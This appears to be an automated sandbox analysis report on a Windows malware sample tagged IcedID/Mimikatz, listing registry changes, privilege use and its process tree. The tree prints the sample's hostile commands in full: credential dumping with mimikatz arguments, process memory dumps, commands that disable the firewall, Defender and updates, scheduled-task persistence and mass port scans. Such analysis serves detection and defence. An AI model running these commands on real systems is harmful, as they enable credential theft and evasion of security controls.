Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ijkbpltap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" jbltict.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ijkbpltap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ijkbpltap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ijkbpltap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ijkbpltap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ijkbpltap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ijkbpltap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ jbltict.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ijkbpltap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ijkbpltap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ijkbpltap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" jbltict.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" jbltict.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ijkbpltap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing jbltict.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" jbltict.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4172 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2268 2024-05-04_fa30f66cc71678193e16cea8a1dcd029_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2268 2024-05-04_fa30f66cc71678193e16cea8a1dcd029_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3564 jbltict.exe Token: SeDebugPrivilege 2920 jbltict.exe Token: SeDebugPrivilege 2732 vfshost.exe Token: SeDebugPrivilege 3252 ijkbpltap.exe Token: SeLockMemoryPrivilege 1844 etbisp.exe Token: SeLockMemoryPrivilege 1844 etbisp.exe Token: SeDebugPrivilege 2776 ijkbpltap.exe Token: SeDebugPrivilege 464 ijkbpltap.exe Token: SeDebugPrivilege 3876 ijkbpltap.exe Token: SeDebugPrivilege 4164 ijkbpltap.exe Token: SeDebugPrivilege 3680 ijkbpltap.exe Token: SeDebugPrivilege 2420 ijkbpltap.exe Token: SeDebugPrivilege 4052 ijkbpltap.exe Token: SeDebugPrivilege 1652 ijkbpltap.exe Token: SeDebugPrivilege 2388 ijkbpltap.exe Token: SeDebugPrivilege 3284 ijkbpltap.exe Token: SeDebugPrivilege 4800 ijkbpltap.exe Token: SeDebugPrivilege 4324 ijkbpltap.exe Token: SeDebugPrivilege 4340 ijkbpltap.exe Token: SeDebugPrivilege 2888 ijkbpltap.exe Token: SeDebugPrivilege 4728 ijkbpltap.exe Token: SeDebugPrivilege 4972 ijkbpltap.exe Token: SeDebugPrivilege 1380 ijkbpltap.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2268 2024-05-04_fa30f66cc71678193e16cea8a1dcd029_hacktools_icedid_mimikatz.exe 2268 2024-05-04_fa30f66cc71678193e16cea8a1dcd029_hacktools_icedid_mimikatz.exe 3564 jbltict.exe 3564 jbltict.exe 2920 jbltict.exe 2920 jbltict.exe 1484 xohudmc.exe 2700 zebhau.exe 220 jbltict.exe 220 jbltict.exe 208 jbltict.exe 208 jbltict.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2268 wrote to memory of 4744 2268 2024-05-04_fa30f66cc71678193e16cea8a1dcd029_hacktools_icedid_mimikatz.exe 84 PID 2268 wrote to memory of 4744 2268 2024-05-04_fa30f66cc71678193e16cea8a1dcd029_hacktools_icedid_mimikatz.exe 84 PID 2268 wrote to memory of 4744 2268 2024-05-04_fa30f66cc71678193e16cea8a1dcd029_hacktools_icedid_mimikatz.exe 84 PID 4744 wrote to memory of 4172 4744 cmd.exe 86 PID 4744 wrote to memory of 4172 4744 cmd.exe 86 PID 4744 wrote to memory of 4172 4744 cmd.exe 86 PID 4744 wrote to memory of 3564 4744 cmd.exe 95 PID 4744 wrote to memory of 3564 4744 cmd.exe 95 PID 4744 wrote to memory of 3564 4744 cmd.exe 95 PID 2920 wrote to memory of 4200 2920 jbltict.exe 97 PID 2920 wrote to memory of 4200 2920 jbltict.exe 97 PID 2920 wrote to memory of 4200 2920 jbltict.exe 97 PID 4200 wrote to memory of 976 4200 cmd.exe 99 PID 4200 wrote to memory of 976 4200 cmd.exe 99 PID 4200 wrote to memory of 976 4200 cmd.exe 99 PID 4200 wrote to memory of 4608 4200 cmd.exe 100 PID 4200 wrote to memory of 4608 4200 cmd.exe 100 PID 4200 wrote to memory of 4608 4200 cmd.exe 100 PID 4200 wrote to memory of 856 4200 cmd.exe 101 PID 4200 wrote to memory of 856 4200 cmd.exe 101 PID 4200 wrote to memory of 856 4200 cmd.exe 101 PID 4200 wrote to memory of 2720 4200 cmd.exe 102 PID 4200 wrote to memory of 2720 4200 cmd.exe 102 PID 4200 wrote to memory of 2720 4200 cmd.exe 102 PID 4200 wrote to memory of 3236 4200 cmd.exe 103 PID 4200 wrote to memory of 3236 4200 cmd.exe 103 PID 4200 wrote to memory of 3236 4200 cmd.exe 103 PID 4200 wrote to memory of 1332 4200 cmd.exe 104 PID 4200 wrote to memory of 1332 4200 cmd.exe 104 PID 4200 wrote to memory of 1332 4200 cmd.exe 104 PID 2920 wrote to memory of 1680 2920 jbltict.exe 105 PID 2920 wrote to memory of 1680 2920 jbltict.exe 105 PID 2920 wrote to memory of 1680 2920 jbltict.exe 105 PID 2920 wrote to memory of 2848 2920 jbltict.exe 107 PID 2920 wrote to memory of 2848 2920 jbltict.exe 107 PID 2920 wrote to memory of 2848 2920 jbltict.exe 107 PID 2920 wrote to memory of 2312 2920 jbltict.exe 109 PID 2920 wrote to memory of 2312 2920 jbltict.exe 109 PID 2920 wrote to memory of 2312 2920 jbltict.exe 109 PID 2920 wrote to memory of 3624 2920 jbltict.exe 114 PID 2920 wrote to memory of 3624 2920 jbltict.exe 114 PID 2920 wrote to memory of 3624 2920 jbltict.exe 114 PID 3624 wrote to memory of 4480 3624 cmd.exe 116 PID 3624 wrote to memory of 4480 3624 cmd.exe 116 PID 3624 wrote to memory of 4480 3624 cmd.exe 116 PID 4480 wrote to memory of 4312 4480 wpcap.exe 117 PID 4480 wrote to memory of 4312 4480 wpcap.exe 117 PID 4480 wrote to memory of 4312 4480 wpcap.exe 117 PID 4312 wrote to memory of 4416 4312 net.exe 119 PID 4312 wrote to memory of 4416 4312 net.exe 119 PID 4312 wrote to memory of 4416 4312 net.exe 119 PID 4480 wrote to memory of 1064 4480 wpcap.exe 120 PID 4480 wrote to memory of 1064 4480 wpcap.exe 120 PID 4480 wrote to memory of 1064 4480 wpcap.exe 120 PID 1064 wrote to memory of 4632 1064 net.exe 122 PID 1064 wrote to memory of 4632 1064 net.exe 122 PID 1064 wrote to memory of 4632 1064 net.exe 122 PID 4480 wrote to memory of 3700 4480 wpcap.exe 123 PID 4480 wrote to memory of 3700 4480 wpcap.exe 123 PID 4480 wrote to memory of 3700 4480 wpcap.exe 123 PID 3700 wrote to memory of 4104 3700 net.exe 125 PID 3700 wrote to memory of 4104 3700 net.exe 125 PID 3700 wrote to memory of 4104 3700 net.exe 125 PID 4480 wrote to memory of 536 4480 wpcap.exe 126
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2148
-
C:\Windows\TEMP\iitktzuiz\etbisp.exe"C:\Windows\TEMP\iitktzuiz\etbisp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1844
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-04_fa30f66cc71678193e16cea8a1dcd029_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-04_fa30f66cc71678193e16cea8a1dcd029_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\fbmdkvil\jbltict.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:4172
-
-
C:\Windows\fbmdkvil\jbltict.exeC:\Windows\fbmdkvil\jbltict.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3564
-
-
-
C:\Windows\fbmdkvil\jbltict.exeC:\Windows\fbmdkvil\jbltict.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:4200 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:976
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:856
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:2720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3236
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:1332
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:1680
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:2848
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:2312
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bduajgtgb\ypilwlgzb\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:3624 -
C:\Windows\bduajgtgb\ypilwlgzb\wpcap.exeC:\Windows\bduajgtgb\ypilwlgzb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:4416
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:4632
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:4104
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:536
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:3160
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4928
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:1320
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:1704
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:976
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:1144
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4980
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bduajgtgb\ypilwlgzb\ykkbmqtil.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\bduajgtgb\ypilwlgzb\Scant.txt2⤵PID:4344
-
C:\Windows\bduajgtgb\ypilwlgzb\ykkbmqtil.exeC:\Windows\bduajgtgb\ypilwlgzb\ykkbmqtil.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\bduajgtgb\ypilwlgzb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3284
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bduajgtgb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\bduajgtgb\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:4648 -
C:\Windows\bduajgtgb\Corporate\vfshost.exeC:\Windows\bduajgtgb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tbmdnlyim" /ru system /tr "cmd /c C:\Windows\ime\jbltict.exe"2⤵PID:4324
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4424
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tbmdnlyim" /ru system /tr "cmd /c C:\Windows\ime\jbltict.exe"3⤵
- Creates scheduled task(s)
PID:4696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "kvbuyatpt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\fbmdkvil\jbltict.exe /p everyone:F"2⤵PID:2420
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1824
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "kvbuyatpt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\fbmdkvil\jbltict.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:1004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zlptugnbl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\iitktzuiz\etbisp.exe /p everyone:F"2⤵PID:3492
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4320
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "zlptugnbl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\iitktzuiz\etbisp.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:4416
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:3436
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:4632
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3312
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:3240
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:4612
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:4692
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3936
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:3248
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:2396
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:3628
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4076
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4068
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:2848
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:1920
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:4836
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:3804
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:2268
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:4768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:4324
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:2604
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:348
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:3780
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:4556
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:1696
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:4704
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:3364
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:1596
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:1608
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:2256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:3548
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:4428
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:4800
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:1856
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:3692
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:1484
-
-
C:\Windows\TEMP\bduajgtgb\ijkbpltap.exeC:\Windows\TEMP\bduajgtgb\ijkbpltap.exe -accepteula -mp 800 C:\Windows\TEMP\bduajgtgb\800.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3252
-
-
C:\Windows\TEMP\bduajgtgb\ijkbpltap.exeC:\Windows\TEMP\bduajgtgb\ijkbpltap.exe -accepteula -mp 384 C:\Windows\TEMP\bduajgtgb\384.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
C:\Windows\TEMP\bduajgtgb\ijkbpltap.exeC:\Windows\TEMP\bduajgtgb\ijkbpltap.exe -accepteula -mp 2148 C:\Windows\TEMP\bduajgtgb\2148.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:464
-
-
C:\Windows\TEMP\bduajgtgb\ijkbpltap.exeC:\Windows\TEMP\bduajgtgb\ijkbpltap.exe -accepteula -mp 2448 C:\Windows\TEMP\bduajgtgb\2448.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3876
-
-
C:\Windows\TEMP\bduajgtgb\ijkbpltap.exeC:\Windows\TEMP\bduajgtgb\ijkbpltap.exe -accepteula -mp 2592 C:\Windows\TEMP\bduajgtgb\2592.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4164
-
-
C:\Windows\TEMP\bduajgtgb\ijkbpltap.exeC:\Windows\TEMP\bduajgtgb\ijkbpltap.exe -accepteula -mp 3008 C:\Windows\TEMP\bduajgtgb\3008.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3680
-
-
C:\Windows\TEMP\bduajgtgb\ijkbpltap.exeC:\Windows\TEMP\bduajgtgb\ijkbpltap.exe -accepteula -mp 3184 C:\Windows\TEMP\bduajgtgb\3184.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
C:\Windows\TEMP\bduajgtgb\ijkbpltap.exeC:\Windows\TEMP\bduajgtgb\ijkbpltap.exe -accepteula -mp 3856 C:\Windows\TEMP\bduajgtgb\3856.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4052
-
-
C:\Windows\TEMP\bduajgtgb\ijkbpltap.exeC:\Windows\TEMP\bduajgtgb\ijkbpltap.exe -accepteula -mp 3952 C:\Windows\TEMP\bduajgtgb\3952.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
C:\Windows\TEMP\bduajgtgb\ijkbpltap.exeC:\Windows\TEMP\bduajgtgb\ijkbpltap.exe -accepteula -mp 4016 C:\Windows\TEMP\bduajgtgb\4016.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
C:\Windows\TEMP\bduajgtgb\ijkbpltap.exeC:\Windows\TEMP\bduajgtgb\ijkbpltap.exe -accepteula -mp 2512 C:\Windows\TEMP\bduajgtgb\2512.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3284
-
-
C:\Windows\TEMP\bduajgtgb\ijkbpltap.exeC:\Windows\TEMP\bduajgtgb\ijkbpltap.exe -accepteula -mp 1212 C:\Windows\TEMP\bduajgtgb\1212.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4800
-
-
C:\Windows\TEMP\bduajgtgb\ijkbpltap.exeC:\Windows\TEMP\bduajgtgb\ijkbpltap.exe -accepteula -mp 2428 C:\Windows\TEMP\bduajgtgb\2428.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4324
-
-
C:\Windows\TEMP\bduajgtgb\ijkbpltap.exeC:\Windows\TEMP\bduajgtgb\ijkbpltap.exe -accepteula -mp 2296 C:\Windows\TEMP\bduajgtgb\2296.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4340
-
-
C:\Windows\TEMP\bduajgtgb\ijkbpltap.exeC:\Windows\TEMP\bduajgtgb\ijkbpltap.exe -accepteula -mp 1988 C:\Windows\TEMP\bduajgtgb\1988.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2888
-
-
C:\Windows\TEMP\bduajgtgb\ijkbpltap.exeC:\Windows\TEMP\bduajgtgb\ijkbpltap.exe -accepteula -mp 5100 C:\Windows\TEMP\bduajgtgb\5100.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4728
-
-
C:\Windows\TEMP\bduajgtgb\ijkbpltap.exeC:\Windows\TEMP\bduajgtgb\ijkbpltap.exe -accepteula -mp 3268 C:\Windows\TEMP\bduajgtgb\3268.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Windows\TEMP\bduajgtgb\ijkbpltap.exeC:\Windows\TEMP\bduajgtgb\ijkbpltap.exe -accepteula -mp 3336 C:\Windows\TEMP\bduajgtgb\3336.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\bduajgtgb\ypilwlgzb\scan.bat2⤵PID:2776
-
C:\Windows\bduajgtgb\ypilwlgzb\luiilunid.exeluiilunid.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:3612
-
-
-
